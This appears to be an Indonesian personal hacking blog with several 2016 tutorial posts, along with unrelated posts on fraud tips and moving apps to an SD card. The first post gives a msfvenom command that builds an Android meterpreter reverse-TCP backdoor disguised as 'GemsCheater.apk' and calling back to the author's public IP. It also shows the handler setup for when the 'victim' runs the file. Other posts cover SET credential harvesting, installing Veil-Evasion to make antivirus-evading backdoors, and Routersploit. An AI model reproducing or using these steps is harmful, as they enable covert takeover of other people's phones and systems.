Sabtu, 03 September 2016

backdoor android beda jaringan

malam ini saya akan memberikan suatu pelajaran yang sangat penting yaitu cara menyisipkan backdoor android yang beda jaringan :D ...oke tanpa panjang dan lebar
pertama adalah Setting port forward anda pada gateway
save & quit

 
pertama-tama buat dulu file backdoornya
buka terminal anda dan masukan perintah berikut
msfvenom -p android/meterpreter/reverse_tcp LHOST=180.252.XXX.XXX LPORT=7777 R> GemsCheater.apk
Note : 180.252.xxx.xxx adalah ip publik saya , jadi gunakan ip publik anda sendiri
7777 port saya, anda bisa menggantinya sampai 65000
GemsCheater adalah nama backdoor saya yang nanti akan di outputkan di file home dan apk adalah extensi khusus buat android
 
 buka metasploit

msfconsole

 use multi/handler

 set LHOST 192.168.1.64

 set LPORT 7777

 exploit

Note : 192.168.1.64 adalah ip lokal saya
7777 adalah port yang gw sesuaikan pada backdoor yang di buat sebelumnya
jika sudah di eksekusi oleh korban
maka meterpreter akan terlihat di terminal
masukan perintah di bawah untuk menghetahui fungsi nya dri payload tsb
help

untuk melihat options yang ingin anda gunakan


oke sekian dari saya malam ini, mungkin cukup singkat materi saya malam ini karna saya sebenarnya tdk mood untuk mempost blog terlebih dahulu tapi karna janji, saya akan tetap mempost setiap walaupun sedang tdk mood seperti ini :V 

sumber:http://rextor404.blogspot.co.id/2015/12/hack-android-beda-jaringan-menggunakan.html
https://community.rapid7.com
Diposting oleh di 1 komentar:

Senin, 22 Agustus 2016

cara pentest menggunakan social engineering toolkit framework

oke pada siang hari ini saya akan mengenalkan SET social engineering toolkit. SET adalah alat pentest untuk mengetes keamanan sebuah website baik dari tampilan ataupun data base nya
oke tanpa bnyak bicara saya akan memperkenalkan cara nya :D
Bahan Bahan
1.Kali Linux/ubuntu (With Social Engineering Toolkit) 
klo blm punya apt get install aj :v 
2.Pergi ke > Applications > Exploitation Tools > Social Engineering Toolkit > seetolkit
3.ketik mulai dari 1 sampai 3 misalkan
1 (enter)
2(enter)
3(enter)
2 (enter)
maka akan diarahkan kita dipertanyakan IP Addres kalian :D 
set>webattack > IP Addres for the POST back in Harvester/tabnabbing:
 nah kalau udah gitu buka Terminal kalian 
4.ketik ini > ifconfig lalu enter ! cari deh yg inet addr:192.153.04.1 misalkan
nah copy paste aja deh IP Addresnya :D  lalu enter !

sudah itu saja :D , semoga membantu pada saat anda sedang melakukan pentest :D 
maaf klo ada salah kata :D 
source:ICDT
Diposting oleh di Tidak ada komentar:

Jumat, 19 Agustus 2016

Lab pentest

oke kembali ke saya...saya akan memaparkan lab pentest(penetration testing) gratis.
Yang perlu kita ketahui membangun lab pentest tdk semudah yang kita kira,kita hrus menyeting port,ip,security di tiap ip,dll. Nah maka dari itu saya akan membagikan link pentest gratis, tpi ini bukan bahasa indonesia tpi bahasa inggris :D
Lab pentest ini berasal dari russia,dan di ciptakan oleh DEFCON.RU
oke saya akan memaparkan cara masuk ke lab pentest ini

1.kita ke https://lab.pentestit.ru
2.setelah itu kita sing up/login(bagi yg sudah memiliki akun)
3.setelah login kita ke "how to connect"
4.kita login dengan password ovpn yg telah mereka ksih ke kita

5.download config openVpn mereka
6.setelah di download anda ke terminal untuk login VPN mereka
7.cari config open VPN mereka, sperti di bawah config mereka
seperti itu config mereka
8.login ke terminal dan arahkan openVPN ke config mereka
9.setelah itu anda akan terhubung. Untuk mengecek apa benar anda terhubung silahkan isi address bar anda dengan alamat ini "192.168.101.6"

sekian dari saya mohon maaf bila ada salah kata
Diposting oleh di Tidak ada komentar:

Selasa, 16 Agustus 2016

cara menginstal Veil Evasion di Ubuntu 64bit

oke pada hari proklamasi kemerdekaan Indonesia ini saya akan menerangkan cara menginstal Veil Evasion di ubuntu 64bit
Veil Evasion adalah sebuah tool/alat untuk membuat Backdoor/virus di linux tanpa ketahuan oleh Anti virus
oke seperti ini cara menginstal veil evasion di ubuntu:
$ git clone https://github.com/Veil-Framework/Veil-Evasion
$ cd Veil-Evasion
$ cd setup
Hanya untuk versi OS 64bit
Masukkan command :
$ gedit setup.sh
Lalu cari kode
Ini :
# Check For 64-bit Kernel
  if [ $(uname -m) == 'x86_64' ]; then
    if [ "${os}" == "ubuntu" ] || [ "${os}" == "debian" ] || [ "${os}" == "kali" ]; then
      echo -e '\n\n [*] Adding i386 Architecture To x86_64 System'
      sudo dpkg --add-architecture i386
      sudo apt-get -q update
      echo -e '\n\n [*] Installing (Wine) i386 Binaries'
      sudo ${arg} apt-get -y install wine32
      sudo ${arg} apt-get -y install wine-bin:i386
      tmp="$?"
      [ "${tmp}" -ne "0" ] && echo -e " [ERROR] Failed To Install Wine x86_64... Exit Code: ${tmp}.\n" && exit 1
    else
      echo -e '\n\n [*] Installing 32bit wine on x86_64 System'
      sudo dnf install -y wine.i686
      tmp="$?"
      [ "${tmp}" -ne "0" ] && echo -e " [ERROR] Failed To Install Wine... Exit Code: ${tmp}.\n" && exit 1
    fi
  fi


Ganti dengan ini :

 # Check For 64-bit Kernel
  if [ $(uname -m) == 'x86_64' ]; then
    if [ "${os}" == "ubuntu" ] || [ "${os}" == "debian" ] || [ "${os}" == "kali" ]; then
      echo -e '\n\n [*] Adding i386 Architecture To x86_64 System'
      sudo dpkg --add-architecture i386
      sudo apt-get -q update
      echo -e '\n\n [*] Installing (Wine) '
      sudo ${arg} apt-get install wine
      sudo ${arg} apt-get install wine
      tmp="$?"
      [ "${tmp}" -ne "0" ] && echo -e " [ERROR] Failed To Install Wine x86_64... Exit Code: ${tmp}.\n" && exit 1
    else
      echo -e '\n\n [*] Installing 64bit wine on 64 System'
      sudo apt-get install wine
      tmp="$?"
      [ "${tmp}" -ne "0" ] && echo -e " [ERROR] Failed To Install Wine... Exit Code: ${tmp}.\n" && exit 1
    fi
  fi

Selanjutnya save.
Jalankan setup nya.
$ ./setup.sh -s
$ cd ..
$ ./Veil-Evasion.py
Veil evasion lebih "mudah" dri pda msfvenom, Veil evasion pun bisa membypass anti virus avira
bagi yang kesusahaan silahkan tanya di komentar
mungkin itu saja yang saya sampaikan maaf klo untuk debian,etc saya blm bisa posting mungkin di lain waktu saya akan posting. mungkin post selanjut nya cara menggunakaan "Metasploit"
Diposting oleh di 1 komentar:

cara menanggulangi FRAUD

oke berhubung kerjaan saya tdk saya lanjut maka saya akan memberitahu agar tidak terkena FRAUD. FRAUD itu apa sih ? Fraud adalah pencurian data sensitif yg sering terjadi di dunia maya. contoh nya gmna mas ? contoh nya penipuan paypal,phising,dll
mungkin akhir ini kita di guncangkan dengan di perjual belikan nya akun G*-jek di face*ook,dll
Fraud ini di bagi beberapa macam :
1.credit card fraud/pencurian kartu kredit
2.data fraud/pencurian data
3.bank account fraud/pencurian data bank(ini paling berbahaya)
oke gk usah lama" saya bercerita panjang lebar, lagian kopi saya jga sudah hbis wkwkwkwkwk :V
cara menghindari fraud :
1.usahakan kerahasian data anda tetap aman. mau di dunia maya/dunia nyata
2.usahakan jngan asal mengimput data dari email/offer(penawaran) karna itu sangat berbahaya bagi diri anda,dan data anda
3.usahakan belanja di web shop yang sudah terkenal sperti toko*dia,dll. Apa saya tdk boleh belanja di lain itu,dan hrus di situ ? bukan tdk boleh tpi mengantisipasi data anda di ambil orang tdk bertanggung jawab,dan saya sarankan lebih baik belanja di web di atas,karna keamanan web nya lebih terjamin. Kok bisa bocor ? karna database mereka di rusak oleh hacker(SQL INJECTION)

Dah mungkin itu saja yang saya sampaikan, mungkin akan ada sedikit tambahan dri saya. Mohon maaf bila ada salah" kata dari saya :D
sekian dan terima kasih
created by:Iqbal naveliano


Diposting oleh di Tidak ada komentar:

Mengexploit Router dengan Routersploit Framework

terkadang mengexploit suatu site itu lebih mudah dari pada mengexploit Hardware, kenapa ? Karna web teralu banyak vuln yang bisa di cari menggunakan dork google.
nah kebetulan akhir"ini bnyak sekali yg ngebahas Routersploit ini,di forum Underground,grup fb underground,dll
pada kesempatan kali ini saya akan menjelaskan cara menginstal Routersploit
Apa sih Routersploit itu ? sebuah exploit yang bisa mengexploit Router dengan linux
Routersploit ini sendiri di tulis menggunakan bhasa python(py), dan dikembangkan oleh Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz). Saat ini RouterSploit sudah rilis versi yang ke 2.0.0 .
Untuk tampilannya sendiri, RuoterSploit dibuat mirip dengan Metasploit, jadi buat yang suka main metasploit pasti akan merasa familiar, apa lagi yang sering menggunakan metasploit sebagai alat untuk membuat Backdoor di Android :V
pasti dia akan tau tentang Routersploit ini :D
Installation on Kali
Instalasi RouterSploit di Kali Linux





ketikan perintah pada terminal seperti ini :

git clone https://github.com/reverse-shell/routersploit

cd routersploit

./rsf.py



Installation on Ubuntu



Instalasi di Ubuntu dan turunannya.



 sama ketikan perintah di terminal



sudo apt-get install python-dev python-pip libncurses5-dev git
git clone https://github.com/reverse-shell/routersploit
cd routersploit

sudo pip install -r requirements.txt

./rsf.py

Update



RouterSploit adalah project yang terus berkembang dan mengalami update 
setiap hari nya. Jadi ada baiknya kalian juga ssering melakukan update 
tools secara berkala.





cd routersploit

git pull


Fix Routersploit di Ubuntu

Di kasus saya sendiri hal ini disebabkan pip yang tidak update. 







cd routersploit

sudo pip install --upgrade pip

sudo sudo pip install -r requirements.txt --upgrade

./rsf.py

contoh Routersploit di gunakan





biasa nya saat celah di temukan pada router, Routersploit akan menampilkan notice nya :





dan proses akhir nya :





Sebenarnya ada banyak module yang 
bisa kalian coba. Di RouterSploit sendiri saat ini ada 44 total module 
eksploitasi router. Solahkan dicoba.



Nah sekian dulu karna ini sudah jam 02:37 dan saya pun msih bnyak pekerjaan yg harus saya selesaikan. Sekian dan terimakasih, jika Kesusahaan tanya di kolom komentar :D 

Source:linuxsec.org














Diposting oleh



di





2 komentar:
  


































          

        

          

        

Sabtu, 14 Maret 2015


          

        










cara memindahkan aplikasi ke sd-card










cara memindahkan aplikasi ke sd-card.pakah Anda kehabisan ruang penyimpanan aplikasi?

Anda benci ketika harus memeriksa setiap aplikasi jika mereka mendukung pemindahan ke kartu SD? Apakah Anda menginginkan sebuah aplikasi yang secara otomatis melakukan hal ini untuk Anda dan dapat memberitahukan Anda ketika sebuah aplikasi dapat dipindahkan? Komponen ini mempersingkat pemindahan aplikasi ke penyimpanan internal ataupun eksternal melalui Pengaturan perangkat Anda. Dengan ini, Anda akan memiliki kontrol lebih terhadap perluasan koleksi aplikasi Anda. Hal ini sangatlah penting bagi siapapun yang memiliki masalah dalam pengelolaan memori.





Langkah-langkah :


    

  • Instal App 2 SD aplikasi dari Google Play Store secara gratis disini : AppMgr III (App 2 SD)
    • 

  • Buka aplikasi
    • 

  • Menghapus cache aplikasi jika Anda melihat pesan
    • 

  • Dalam antarmuka utama, Anda akan melihat semua aplikasi yang dapat dipindahkan ke kartu SD. Tekan pada aplikasi yang ingin Anda pindah ke kartu SD. Dalam contoh ini, saya telah memilih aplikasi Skype.
    

    

    

    

    • 

  • 
Tekan pada tombol'Move to SD card' .
    

    

    

    • 

  • 

    

      

    • Tunggu sampai proses selesai
      • 

    • Silahkan memindahkan semua aplikasi ke kartu SD jika Anda inginkan.
      • 

    • Pada home App2SD, tekan tombol di bagian bawah kanan layar dan tekan 'Move all apps'. 
      • 

    • Pilih aplikasi yang ingin Anda pindah ke kartu SD dan tekan OK. 
      • 

    

    • 











Diposting oleh



di





Tidak ada komentar:
  


































        

      









Langganan:
Postingan (Atom)